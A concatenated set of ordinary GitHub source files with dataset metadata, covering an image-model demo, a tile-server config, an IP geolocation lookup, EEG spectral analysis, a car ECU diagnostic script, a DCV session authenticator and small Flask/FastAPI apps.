parser.add_argument('--config', type=str, default='rnw_star')\n parser.add_argument('--checkpoint', type=str, default='checkpoints/rnw_star/checkpoint_epoch=179.ckpt')\n parser.add_argument('--ref_img_path', type=str, default='data/CORN_2/trainB/aug_1_batch_1_54.tif')\n return parser.parse_args()\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\n\ndef make_dataset(directory):\n images = []\n assert os.path.isdir(directory), '%s is not a valid directory' % directory\n\n for root, _, fnames in sorted(os.walk(directory)):\n for fname in fnames:\n if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n return images\n\n\nif __name__ == '__main__':\n # parse args\n args = parse_args()\n # config\n cfg = Config.fromfile(osp.join('configs/', f'{args.config}.yaml'))\n # device\n device = torch.device('cuda')\n # read list file\n image_list = make_dataset(args.root_dir)\n # model\n net: pytorch_lightning.LightningModule = MODELS.build(name='rnw_star', option=cfg)\n net.load_state_dict(torch.load(args.checkpoint, map_location='cpu')['state_dict'])\n net.to(device)\n net.eval()\n print('Successfully load weights from check point {}.'.format(args.checkpoint))\n # transform\n to_tensor = ToTensor()\n # visualization\n visualization_dir = os.path.join(_OUT_DIR, 'visualization/')\n if not os.path.exists(visualization_dir):\n os.makedirs(visualization_dir)\n\n # no grad\n with torch.no_grad():\n # predict\n for idx, item in enumerate(tqdm(image_list)):\n # read image\n rgb = cv2.imread(item, 1)\n ref_img = cv2.imread(args.ref_img_path, 1)\n # to tensor\n t_rgb = to_tensor(rgb).unsqueeze(0).to(device)\n ref_img = to_tensor(ref_img).unsqueeze(0).to(device)\n # feed into net\n y_trg = torch.LongTensor([1]).to(device)\n outputs = net(t_rgb, ref_img, y_trg)\n disp = outputs\n\n # visualization\n disps = disp.cpu()[0, :, :, :].numpy() * 255\n disps = disps.transpose([1, 2, 0])\n out_fn = os.path.join(visualization_dir, 'aug_{}.png'.format((item.split(\"/\")[-1]).split('.')[0]))\n cv2.imwrite(out_fn, disps)\n\n # show message\n tqdm.write('Done.')\n","repo_name":"ChunmingHe/HQG-Net","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"66"} +{"seq_id":"8309285250","text":"DATABASES = {\n \"default\": \"dbname=osm user=osm 
password=osm host=localhost\"\n}\nRECIPES = []\nTILEJSON = {\n \"tilejson\": \"2.1.0\",\n \"name\": \"utilery\",\n \"description\": \"A lite vector tile server\",\n \"scheme\": \"xyz\",\n \"format\": \"pbf\",\n \"tiles\": [\n \"http://vector.myserver.org/all/{z}/{x}/{y}.pbf\"\n ],\n}\nBUILTIN_PLUGINS = ['utilery.plugins.builtins.CORS']\nPLUGINS = []\nDEBUG = False\nSRID = 900913\nSCALE = 1\nBUFFER = 0\nCLIP = False\nCORS = \"*\"\n","repo_name":"tilery/utilery","sub_path":"utilery/config/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"66"} +{"seq_id":"27359529005","text":"#!/usr/bin/python3\n\nimport requests\nimport socket\nimport sys\n\nMSG_EXIT_USE = \"usage: python3 %s \"\nMSG_EXIT_INT = \"\\nkeyboard interrupt.\"\nMSG_EXIT_ERR = \"error: %s\"\n\ndef isValidAddress(ip_address):\n\t\"\"\" Checks if an IP address is valid or not (thanks to https://stackoverflow.com/a/4017219). \"\"\"\n\ttry:\n\t\tsocket.inet_pton(socket.AF_INET, ip_address)\n\texcept AttributeError:\n\t\ttry:\n\t\t\tsocket.inet_aton(ip_address)\n\t\texcept socket.error:\n\t\t\treturn False\n\t\treturn ip_address.count(\".\") == 3\n\texcept socket.error:\n\t\treturn False\n\treturn True\n\ndef printDetails(request_json):\n\t\"\"\" Prints details for an IP lookup request. \"\"\"\n\tprint(\"[+] lookup information for: %s\" % request_json[\"query\"])\n\tprint(\"[+] geolocation IP informations:\")\n\tprint(\"latitude > %s\" % str(request_json[\"lat\"]))\n\tprint(\"longitude > %s\" % str(request_json[\"lon\"]))\n\tprint(\"country > %s [%s]\" % (request_json[\"country\"], request_json[\"countryCode\"]))\n\tprint(\"region > %s [%s]\" % (request_json[\"regionName\"], request_json[\"region\"]))\n\tprint(\"city > %s (%s)\" % (request_json[\"city\"], request_json[\"zip\"]))\n\tprint(\"timezone > %s\" % request_json[\"timezone\"])\n\tprint(\"[+] general IP informations:\")\n\tprint(\"isp > %s\" % request_json[\"isp\"])\n\tprint(\"as number/name > %s\" % request_json[\"as\"])\n\tprint(\"organization name > %s\" % request_json[\"org\"])\n\t\ndef lookupAddress(ip_address):\n\t\"\"\" Gets details about the given IP address. 
\"\"\"\n\t\n\tapi_link = \"http://ip-api.com/json/\"\n\tif isValidAddress(ip_address) is False:\n\t\tsys.exit(MSG_EXIT_ERR % \"invalid ip address.\")\n\n\ttry:\n\t\trequest = requests.get(api_link + ip_address)\n\t\trequest_json = request.json()\n\t\tif request_json[\"status\"] == \"success\":\n\t\t\tprintDetails(request_json)\n\t\telse:\n\t\t\tsys.exit(MSG_EXIT_ERR % str(request.status_code))\n\texcept requests.exceptions.RequestException as error:\n\t\tsys.exit(MSG_EXIT_ERR % str(error))\n\nif __name__ == \"__main__\":\n\n\tif len(sys.argv) != 2:\n\t\tsys.exit(MSG_EXIT_USE % sys.argv[0])\n\n\ttry:\n\t\tlookupAddress(sys.argv[1])\n\texcept KeyboardInterrupt:\n\t\tsys.exit(MSG_EXIT_INT)\n\texcept Exception as error:\n\t\tsys.exit(MSG_EXIT_ERR % str(error))\n","repo_name":"kenuosec/py3-toolkit","sub_path":"scripts/lookup-ipv4.py","file_name":"lookup-ipv4.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"20584032391","text":"# -*- coding: utf-8 -*-\n\nweekday1 = ['Sun', 'Mon', 'Tue', 'Wed', 'Thr', 'Fri', 'Sat']\nweekday2 = ['日', '月', '火', '水', '木', '金', '土']\n\nfor en, ja in zip(weekday1, weekday2):\n print(ja + ': ' + en)\n \n \nupperbases = [1, 2, 3, 4, 5]\nlowerbases = [2, 3, 4, 5, 6]\nheights = [3, 4, 5, 6, 7]\n\nfor u, l, h in zip(upperbases, lowerbases, heights):\n print('上底が{}cm、下底が{}cm、高さが{}cmの台形の面積は{}平方cmです'.format(\\\n u, l, h, (u + l) * h))","repo_name":"kawakubo2/my_python","sub_path":"kiso_python/imai/chapter03/zip1.py","file_name":"zip1.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26103231681","text":"\"\"\"\nCompute the Power Spectral Density (PSD) for each channel.\n\nRunning:\nimport subprocess\nsubprocess.run('/net/tera2/home/aino/work/mtbi-eeg/python/processing/eeg/runall.sh', shell=True)\n\n\"\"\"\n\nimport argparse\n\nfrom mne.io import read_raw_fif\nfrom mne.time_frequency import psd_array_welch\nfrom h5io import write_hdf5\nfrom mne.viz import iter_topography\nfrom mne import open_report, find_layout, pick_info, pick_types, set_log_level\nimport matplotlib.pyplot as plt\nimport datetime\nimport time\nimport os\nimport sys\n\nparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.append(parent_dir)\nfrom config_eeg import fname, n_fft, get_all_fnames, task_from_fname, freq_max\n\n# Save time of beginning of the execution to measure running time\nstart_time = time.time()\n\n# Deal with command line arguments\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument('subject', help='The subject to process')\nargs = parser.parse_args()\n\n# Compute the PSD for each task\npsds = dict()\n\n# Not all subjects have files for all conditions. 
These functions grab the\n# files that do exist for the subject.\nexclude = ['emptyroom'] \nbad_subjects = ['01P', '02P', '03P', '04P', '05P', '06P', '07P']#these ica need to be done manually\nall_fnames = zip(\n    get_all_fnames(args.subject, kind='psds', exclude=exclude),\n    get_all_fnames(args.subject, kind='clean', exclude=exclude),\n)\n\nfor psds_fname, clean_fname in all_fnames:\n    task = task_from_fname(clean_fname)\n    run = 1\n    if '1' in task:\n        task_wo_run = task.removesuffix('_run1')\n    elif '2' in task:\n        task_wo_run = task.removesuffix('_run2') \n        run = 2\n    else:\n        task_wo_run = task\n    \n    raw = read_raw_fif(fname.clean(subject=args.subject, task=task_wo_run, run=run,ses='01'),\n                       preload=True)\n    \n    # Reduce logging level (technically, one could define it in the read_raw_fif function, but it seems to be buggy)\n    # More info about the bug can be found here: https://github.com/mne-tools/mne-python/issues/8872\n    set_log_level(verbose='Warning')\n    \n    raw.info['bads']=[]\n    sfreq=raw.info['sfreq']\n    \n    if 'eo' in task or 'ec' in task:\n        clean_1 = raw.copy().crop(tmin=30, tmax=90)\n        clean_2 = raw.copy().crop(tmin=120, tmax=180)\n        clean_3 = raw.copy().crop(tmin=210, tmax=260)\n        # Compute PSDs for all three segments; the report plots below rely on the '_1' keys.\n        psds[task+'_1'], freqs = psd_array_welch(clean_1.get_data(picks=['eeg']), sfreq=sfreq,\n                                                 fmax=freq_max, n_fft=n_fft)\n        psds[task+'_2'], freqs = psd_array_welch(clean_2.get_data(picks=['eeg']), sfreq=sfreq,\n                                                 fmax=freq_max, n_fft=n_fft)\n        psds[task+'_3'], freqs = psd_array_welch(clean_3.get_data(picks=['eeg']), sfreq=sfreq, \n                                                 fmax=freq_max, n_fft=n_fft)\n\n    elif 'PASAT' in task:\n        clean_1 = raw.copy().crop(tmin=2, tmax=62)\n        clean_2 = raw.copy().crop(tmin=62, tmax=122)\n        \n        psds[task+'_1'], freqs = psd_array_welch(clean_1.get_data(picks=['eeg']), sfreq=sfreq,\n                                                 fmax=freq_max, n_fft=n_fft)\n        psds[task+'_2'], freqs = psd_array_welch(clean_2.get_data(picks=['eeg']), sfreq=sfreq,\n                                                 fmax=freq_max, n_fft=n_fft)\n    \n    \n    # Add some metadata to the file we are writing\n    psds['info'] = raw.info\n    psds['freqs'] = freqs\n    write_hdf5(fname.psds(subject=args.subject, ses='01'), psds, overwrite=True)\n\n# Add a PSD plot to the report.\nraw.pick_types(meg=False, eeg=True, eog=False, stim=False, ecg=False, exclude=[])\ninfo = pick_info(raw.info, sel=None)\nlayout = find_layout(info, exclude=[])\n\n\ndef on_pick(ax, ch_idx):\n    \"\"\"Create a larger PSD plot for when one of the tiny PSD plots is\n    clicked.\"\"\"\n    ax.plot(psds['freqs'], psds['ec_1'][ch_idx], color='C0',\n            label='eyes closed')\n    ax.plot(psds['freqs'], psds['eo_1'][ch_idx], color='C1',\n            label='eyes open')\n    ax.plot(psds['freqs'], psds['PASAT_run1_1'][ch_idx], color='C2',\n            label='pasat run 1')\n    ax.plot(psds['freqs'], psds['PASAT_run2_1'][ch_idx], color='C3',\n            label='pasat run 2')\n    ax.legend()\n    ax.set_xlabel('Frequency')\n    ax.set_ylabel('PSD')\n\n\n# Make the big topo figure\nfig = plt.figure(figsize=(14, 9))\naxes = iter_topography(info, layout, on_pick=on_pick, fig=fig,\n                       axis_facecolor='white', fig_facecolor='white',\n                       axis_spinecolor='white')\nfor ax, ch_idx in axes:\n    handles = [\n        ax.plot(psds['freqs'], psds['ec_1'][ch_idx], color='C0'),\n        ax.plot(psds['freqs'], psds['eo_1'][ch_idx], color='C1'),\n        ax.plot(psds['freqs'], psds['PASAT_run1_1'][ch_idx], color='C2'),\n        ax.plot(psds['freqs'], psds['PASAT_run2_1'][ch_idx], color='C3'),\n    ]\nfig.legend(handles)\n\n\nwith open_report(fname.report(subject=args.subject)) as report:\n    report.add_figure(fig, 'PSDs', replace=True)\n    report.save(fname.report_html(subject=args.subject),\n                overwrite=True, open_browser=False)\n\n# Calculate time that the script takes to run\nexecution_time = (time.time() - start_time)\nprint('\\n###################################################\\n')\nprint(f'Execution time of 03_psds.py is: {round(execution_time,2)} 
seconds\\n')\nprint('###################################################\\n')\n","repo_name":"BioMag/mtbi_meeg","sub_path":"src/processing/03_psds.py","file_name":"03_psds.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"70647597972","text":"#this script can read Climate control module on Ford Fusion 2017. HS2. HS2+\n# it requires python-uds\n# user can select one of the options\n# CC reqId = 0x7A7, resId = 0x7AF\n\n#notes (open items):\n# - when clearing DTCs the response recorded only grabs the first answer but sometimes there is a delay on the response,\n# ecu DTC clear: ['0x7f', '0x14', '0x78'], this is telling us the response will be delayed.\n# the actual dtc clear confirmation came after that. 01 54 00 00 00 00 00 00 how to capture it?\n# how to capture the DTCs?? this is the actual response? what to do when there is \n# -------> Ecu Read DTC Cmd ['0x19', '0x2', '0xd']\n#-------> ecuResetResponse: ['0x59', '0x2', '0xca', '0x90', '0x5a', '0x14', '0xa', '0x9a', '0x61', '0x15', '0xa', '0x9a', '0x69', '0x15', '0xa']\n\n# Next steps:\n# convert request services and responses to a more readable code.\n\n# import the library\nfrom uds import Uds\nimport pdb\nimport time\n# this is the one being used on this example:\n# https://python-uds.readthedocs.io/en/latest/interface.html\n# https://github.com/richClubb/python-uds/blob/master/docs/interface.rst\n\n\n\n#https://github.com/pylessard/python-udsoncan\n#https://udsoncan.readthedocs.io/en/latest/\n\n\ncc = Uds(reqId=0x7A7, resId=0x7AF, transportProtocol=\"CAN\", interface=\"peak\", device=\"PCAN_USBBUS1\")\n#time.sleep(0.5)\n\n#pdb.set_trace()\nwhile True:\n userChoice = input(\"Please select the service: \\n\\\n sw = Read SW PN (0xF188) \\n\\\n sn = Read Seria number (0xF18C \\n\\\n d = DTC read \\n\\\n c = DTC clear \\n\\\n r = ecu reset\\n\\\n x = exit the program \\n\\\n your input: \")\n\n if userChoice == 'sn':\n #pdb.set_trace()\n ######################################################################\n # ecu Serial number\n ecuSerialNumberCmd = [0x22, 0xF1, 0x8C]\n try:\n ecuSerialNumberResponse = cc.send(ecuSerialNumberCmd) # gets the entire response from the ECU\n print(\"-------> Ecu Serial number Cmd\", [hex(x) for x in ecuSerialNumberCmd])\n ecuSerialNumberResponse = ecuSerialNumberResponse[3:] # cuts the response down to just the serial number\n ecuSerialNumberResponseString = \"\" # initialises the string\n for i in ecuSerialNumberResponse: ecuSerialNumberResponseString += chr(i) # Iterates over each element and converts the array element into an ASCII string\n print(\"-------> ecu Serial number: \", ecuSerialNumberResponseString)\n except:\n print(\"-------> ECU serial Number Send did not complete/Response not received it\")\n\n elif userChoice == 'sw':\n #pdb.set_trace()\n ######################################################################\n # ecu SW PN\n ecuSwPnCmd = [0x22, 0xF1, 0x88]\n try:\n ecuSwPnResponse = cc.send(ecuSwPnCmd) # gets the entire response from the ECU\n print(\"-------> Ecu Sw PN Cmd\", [hex(x) for x in ecuSwPnCmd])\n #ecuSwPnResponseHex = [hex(x) for x in ecuSwPnResponse]\n ecuSwPnResponse = ecuSwPnResponse[3:] # cuts the response down to just the serial number\n ecuSwPnResponseString = \"\" # initialises the string\n for i in ecuSwPnResponse: ecuSwPnResponseString += chr(i) # Iterates over each element and converts the array element into an ASCII string\n print(\"-------> ecu SW PN: \", 
ecuSwPnResponseString)\n            \n        except:\n            print(\"-------> ECU SW PN Send did not complete/Response not received it\")\n\n    elif userChoice == 'd':\n        #pdb.set_trace()\n        ######################################################################\n        # ecu DTC Read\n        ecuDtcReadCmd = [0x19, 0x02, 0x0D]\n        try:\n            ecuDtcReadResponse = cc.send(ecuDtcReadCmd) # gets the entire response from the ECU\n            print(\"-------> Ecu Read DTC Cmd\", [hex(x) for x in ecuDtcReadCmd])\n            ecuDtcReadHex= [hex(x) for x in ecuDtcReadResponse]\n            print(\"-------> ECU DTC read response: \", ecuDtcReadHex)\n            \n        except:\n            print(\"-------> ECU DTC Read did not complete/Response not received it\")\n\n    elif userChoice == 'c':\n        #pdb.set_trace()\n        ######################################################################\n        # ecu DTC Clear\n        ecuDtcClearCmd = [0x14, 0xFF, 0xFF, 0xFF]\n        try:\n            ecuDtcClearResponse = cc.send(ecuDtcClearCmd) # gets the entire response from the ECU\n            print(\"-------> Ecu Clear DTC Cmd\", [hex(x) for x in ecuDtcClearCmd])\n            ecuDtcClearHex = [hex(x) for x in ecuDtcClearResponse]\n            print(\"-------> ECU DTC Clear: \", ecuDtcClearHex)\n            \n        except:\n            print(\"-------> ECU DTC Clear did not complete/Response not received it\")\n\n    elif userChoice == 'r':\n        #pdb.set_trace()\n        ######################################################################\n        ## reset Cmd\n        ecuResetCmd = [0x11, 0x01] #the number of bytes needs to be removed, it is calculated by the lib\n        try:\n            ecuResetResponse = cc.send(ecuResetCmd) # gets the entire response from the ECU\n            print(\"-------> Ecu Reset Cmd\", [hex(x) for x in ecuResetCmd])\n            ecuResetResponseHex = [hex(x) for x in ecuResetResponse]\n            print(\"-------> ecu Reset Response: \", ecuResetResponseHex)\n            \n        except:\n            print(\"-------> ECU reset Send did not complete/Response not received it\")\n\n\n    elif userChoice == 'x':\n        print(\"program terminated by the user\", userChoice)\n        break\n\n    else:\n        print(\"wrong selection, select a valid option or x to exit\")\n\n","repo_name":"carlosordal/mymodels","sub_path":"python/uds/uds_peak_Fusion_CC_7A7.py","file_name":"uds_peak_Fusion_CC_7A7.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30112598814","text":"import config\nfrom cryptography.fernet import Fernet\nfrom flask_restful import Resource, reqparse\nfrom flask import request\nimport logging\nfrom flask import Response\nimport read_secretmanager\nimport base64\nimport ast\nimport errors\nfrom models import db, LinuxDCVSessions, WindowsDCVSessions\n\nlogger = logging.getLogger(\"api\")\n\n\ndef decrypt(encrypted_text):\n    try:\n        key = config.Config.DCV_TOKEN_SYMMETRIC_KEY\n        cipher_suite = Fernet(key)\n        decrypted_text = cipher_suite.decrypt(encrypted_text)\n        return decrypted_text.decode()\n    except Exception as err:\n        logger.error(f\"Unable to decrypt {encrypted_text} due to {err}\")\n        return False\n\n\nclass DcvAuthenticator(Resource):\n    def post(self):\n        \"\"\"\n        Authenticate a DCV desktop via authToken\n        ---\n        tags:\n            - DCV\n        parameters:\n            - in: body\n              name: body\n              schema:\n                required:\n                    - authenticationToken\n                properties:\n                    authenticationToken:\n                        type: string\n                        description: DCV auth token\n        responses:\n            200:\n                description: The Pair of user/token is valid\n            401:\n                description: Invalid user/token pair\n        \"\"\"\n        logger.info(\"DCV Authentication\")\n        parser = reqparse.RequestParser()\n        parser.add_argument(\"sessionId\", type=str, location=\"form\")\n        parser.add_argument(\"authenticationToken\", 
type=str, location=\"form\")\n parser.add_argument(\"clientAddress\", type=str, location=\"form\")\n args = parser.parse_args()\n remote_addr = request.remote_addr\n if (\n args[\"sessionId\"] is None\n or args[\"authenticationToken\"] is None\n or args[\"clientAddress\"] is None\n ):\n return errors.all_errors(\n \"CLIENT_MISSING_PARAMETER\",\n \"sessionId (str), clientAddress (str) and authenticationToken (str) are required.\",\n )\n session_id = args[\"sessionId\"]\n authentication_token = args[\"authenticationToken\"]\n client_address = args[\"clientAddress\"].split(\":\")[\n 0\n ] # keep only ip, remove port\n error = False\n user = False\n required_params = [\n \"system\",\n \"session_user\",\n \"session_token\",\n \"session_instance_id\",\n ]\n session_info = {}\n logger.info(\"Detected {} and remote_addr {}\".format(args, remote_addr))\n\n try:\n decoded_token = decrypt(base64.b64decode(authentication_token))\n if decoded_token is False:\n logger.error(\n \"Unable to decrypt the authentication token. It was probably generated by a different Fernet key\"\n )\n error = True\n else:\n decoded_token = ast.literal_eval(decoded_token)\n except Exception as err:\n logger.error(\"Unable to base64 decode the authentication token\")\n error = True\n\n if error is False:\n for param in required_params:\n if param not in decoded_token.keys():\n logger.error(\n \"Unable to find {} in {}\".format(decoded_token, decoded_token)\n )\n error = True\n else:\n session_info[param] = decoded_token[param]\n if error is False:\n if session_info[\"system\"].lower() == \"windows\":\n validate_session = WindowsDCVSessions.query.filter_by(\n user=session_info[\"session_user\"],\n session_host_private_ip=remote_addr,\n session_token=session_info[\"session_token\"],\n session_instance_id=session_info[\"session_instance_id\"],\n is_active=True,\n ).first()\n\n else:\n validate_session = LinuxDCVSessions.query.filter_by(\n user=session_info[\"session_user\"],\n session_host_private_ip=remote_addr,\n session_token=session_info[\"session_token\"],\n session_instance_id=session_info[\"session_instance_id\"],\n is_active=True,\n ).first()\n if validate_session:\n user = session_info[\"session_user\"]\n else:\n error = True\n\n if error is False and user is not False:\n if session_info[\"system\"].lower() == \"windows\":\n soca_config = read_secretmanager.get_soca_configuration()\n if soca_config[\"AuthProvider\"] == \"activedirectory\":\n xml_response = f'{soca_config[\"DSDomainNetbios\"]}\\\\{user}'\n else:\n xml_response = (\n '' + user + \"\"\n )\n\n else:\n xml_response = (\n '' + user + \"\"\n )\n\n status = 200\n logger.info(\"Successfully authenticated session\")\n else:\n xml_response = ''\n status = 401\n logger.error(\n \"Unable to authenticate this DCV session. 
Make sure remote_addr points to the private IP address of your DCV manager (verify your proxy settings).\"\n )\n\n return Response(xml_response, status=status, mimetype=\"text/xml\")\n","repo_name":"awslabs/scale-out-computing-on-aws","sub_path":"source/soca/cluster_web_ui/api/v1/dcv/authenticator.py","file_name":"authenticator.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"66"} +{"seq_id":"27307227255","text":"import pandas as pd\nfrom credentials import TARGET_SENDER, OTHER_SENDER\n\ndef extractMsgs():\n # Define the sender's name you want to extract messages from\n target_sender = TARGET_SENDER\n other_sender = OTHER_SENDER\n MSG_FILE = \"../punyRec.txt\"\n\n # Initialize a list to store the messages sent by the target sender\n target_sender_messages = []\n other_sender_messages = []\n\n with open(MSG_FILE, \"r\", encoding=\"utf8\") as file:\n lines = file.readlines()\n\n current_message = \"\"\n other_message = \"\"\n\n # Ensure the first message processed is from the target sender -> this is to get the desired form\n for i in range(0, len(lines)):\n if lines[i].strip().endswith(target_sender):\n start = i\n break\n\n\n # For loop extracts messages from both users in the format:\n # Other sender Message | Target user's response to the message\n # saves results into CSV\n\n # Format is always -> user followed by message on next line\n for i in range(start, len(lines), 2):\n line = lines[i].strip()\n\n if line == \"\":\n continue\n\n # We want to continuously add to the current message -> this is to take care of the cases where\n # Users type semantic sentences in more than one message -> so we merge the lines as such\n if line.endswith(target_sender):\n\n # Process target user message\n current_message += lines[i + 1].strip() + \" \"\n # As soon as we see a line not from target user\n elif line.endswith(other_sender):\n\n ''' We will make the assumption that messages < 3 words long are semantically irrelevant -> just added noise'''\n number_words = current_message.split()\n if len(number_words) >= 3:\n # We only SAVE the other user message when we save target user (so that they come 1:1)\n \n other_sender_messages.append(other_message)\n other_message = \"\"\n # Save target user\n target_sender_messages.append(current_message)\n current_message = \"\"\n\n # Processing the other user's messages => we process them every time we come across them\n other_message += lines[i + 1].strip() + \" \"\n\n # For last message\n if current_message and other_message:\n number_words = current_message.split()\n if len(number_words) >= 3:\n other_sender_messages.append(other_message)\n #other_message = \"\"\n # Save target user\n target_sender_messages.append(current_message)\n\n\n for message in target_sender_messages:\n print(message)\n print(\"=================\")\n for message in other_sender_messages:\n print(message)\n\n \n try:\n df = pd.DataFrame({'Prompt':target_sender_messages[:-1], 'Message': other_sender_messages[1:], 'Response': target_sender_messages[1:]})\n except:\n print(len(target_sender_messages))\n print(len(other_sender_messages))\n # Write the DataFrame to a CSV file\n output_file = \"conversation.csv\"\n df.to_csv(output_file, index=False)\n \n return df\n\n\n''' ==========================FUNCTION CALLS (for testing)=========================== 
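\nExample call (sketch, for testing):\n# df = extractMsgs() # parses ../punyRec.txt and writes conversation.csv\n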
'''\n\n","repo_name":"derronli/cupid-bot","sub_path":"MsgExtract.py","file_name":"MsgExtract.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73071150931","text":"from flask import Flask\n\nfrom app.configs import database, env_configs, migration\n\nfrom app.routes import leads_blueprint\n\n\ndef create_app():\n\n app = Flask(__name__)\n env_configs.init_app(app)\n database.init_app(app)\n migration.init_app(app)\n\n app.register_blueprint(leads_blueprint.bp)\n\n return app\n","repo_name":"Charles-Pinheiro/CRUD-SQL-ORM","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41339945961","text":"# FastAPI, MongoDB\r\nfrom fastapi import APIRouter, HTTPException, status, Depends\r\nfrom beanie import PydanticObjectId\r\n\r\n# DB, Models\r\nfrom database.connection import Database\r\nfrom models.events import Event, EventUpdate\r\n\r\n# AUTH\r\nfrom auth.authenticate import authenticate\r\n\r\n# Other\r\nfrom typing import List\r\n\r\nevent_router = APIRouter(tags=[\"Events\"])\r\nevent_database = Database(Event)\r\n\r\n\r\n@event_router.get(\"/\", response_model=List[Event])\r\nasync def retrieve_all_events() -> List[Event]:\r\n events = await event_database.get_all()\r\n return events\r\n\r\n\r\n@event_router.get(\"/{id}\", response_model=Event)\r\nasync def retrieve_single_event(id: PydanticObjectId,\r\n user: str = Depends(authenticate)) -> Event:\r\n event = await event_database.get(id)\r\n if not event:\r\n raise HTTPException(\r\n status_code=status.HTTP_404_NOT_FOUND,\r\n detail=f\"Event with id {id} not found.\"\r\n )\r\n if event.creator != user:\r\n raise HTTPException(\r\n status_code=status.HTTP_401_UNAUTHORIZED,\r\n detail=\"You dont have permission to get this event.\"\r\n )\r\n else:\r\n return event\r\n\r\n\r\n@event_router.post(\"/new\")\r\nasync def create_event(new_event: Event, user: str = Depends(authenticate)) -> dict:\r\n new_event.creator = user\r\n await event_database.save(new_event)\r\n return {\"message\": \"Event created successfully.\"}\r\n\r\n\r\n@event_router.delete(\"/{id}\")\r\nasync def delete_event(id: PydanticObjectId, user: str = Depends(authenticate)) -> dict:\r\n event = await event_database.get(id)\r\n if not event:\r\n raise HTTPException(\r\n status_code=status.HTTP_404_NOT_FOUND,\r\n detail=f\"Event with id {id} not found.\"\r\n )\r\n if event.creator != user:\r\n raise HTTPException(\r\n status_code=status.HTTP_401_UNAUTHORIZED,\r\n detail=\"You dont have permission to delete this event.\"\r\n )\r\n else:\r\n await event_database.delete(id)\r\n return {\"message\": \"Event deleted successfully.\"}\r\n\r\n\r\n@event_router.delete(\"/\")\r\nasync def delete_all_events(user: str = Depends(authenticate)) -> dict:\r\n events = await event_database.get_all()\r\n for event in events:\r\n if event.creator != user:\r\n continue\r\n await event_database.delete(event.id)\r\n\r\n return {\"message\": \"Events delete successfully.\"}\r\n\r\n\r\n@event_router.put(\"/edit/{id}\", response_model=Event)\r\nasync def update_event(id: PydanticObjectId, new_event: EventUpdate,\r\n user: str = Depends(authenticate)) -> Event:\r\n event = await event_database.get(id)\r\n if not event:\r\n raise HTTPException(\r\n status_code=status.HTTP_404_NOT_FOUND,\r\n detail=f\"Event with id {id} not found.\"\r\n )\r\n if 
event.creator != user:\r\n raise HTTPException(\r\n status_code=status.HTTP_401_UNAUTHORIZED,\r\n detail=\"You don't have permission to change this event.\"\r\n )\r\n else:\r\n updated_event = await event_database.update(id, new_event)\r\n return updated_event\r\n","repo_name":"Kematin/FastAPI-book","sub_path":"ch8/planner/routes/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39951397406","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='home'),\r\n path('diseasetype/', views.type, name='type'),\r\n path('disease/', views.disease, name='disease'),\r\n path('country/', views.country, name='country'),\r\n path('users/', views.users, name='users'),\r\n path('doctors/', views.doctors, name='doctors'),\r\n path('specialize/', views.specialize, name='specialize'),\r\n path('publicservant/', views.publicservant, name='publicservant'),\r\n path('discover/', views.discover, name='discover'),\r\n path('record/', views.record, name='record'),\r\n path('add_type/', views.add_type, name='add_type'),\r\n path('delete_type/', views.delete_type, name='delete_type'),\r\n path('update_type/', views.update_type, name='update_type'),\r\n path('add_disease/', views.add_disease, name='add_disease'),\r\n path('update_disease/', views.update_disease, name='update_disease'),\r\n path('delete_disease/', views.delete_disease, name='delete_disease'),\r\n path('add_country/', views.add_country, name='add_country'),\r\n path('delete_country/', views.delete_country, name='delete_country'),\r\n path('update_country/', views.update_country, name='update_country'),\r\n path('add_user/', views.add_user, name='add_user'),\r\n path('update_user/', views.update_user, name='update_user'),\r\n path('delete_user/', views.delete_user, name='delete_user'),\r\n]","repo_name":"ayazhm/asssignment","sub_path":"test/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34811030823","text":"# encoding: utf-8\n\n#__author__ = Jonas Duarte, duarte.jsystem@gmail.com\n#Python3\n__author__ = 'Jonas Duarte'\n\nimport configparser\n\ndef sesp_server():\n config = configparser.ConfigParser()\n config.read('resources/models/commons/conf.cfg')\n\n debug = config.get('sesp_server', 'debug')\n bind_address = config.get('sesp_server', 'bind_address')\n bind_port = config.get('sesp_server', 'bind_port')\n\n return {\n 'address' : bind_address,\n 'port' : bind_port,\n 'debug' : debug\n }\n\n\ndef fusion_inventory():\n config = configparser.ConfigParser()\n config.read('resources/models/commons/conf.cfg')\n\n server = config.get('fusion_inventory', 'server')\n inventory_frequency = config.get('fusion_inventory', 'inventory_frequency')\n\n return {\n 'server' : server,\n 'inventory_frequency' : int(inventory_frequency),\n }\n\ndef current_version():\n config = configparser.ConfigParser()\n config.read('resources/models/commons/conf.cfg')\n\n current_version = config.get('current_version', 'version')\n\n return 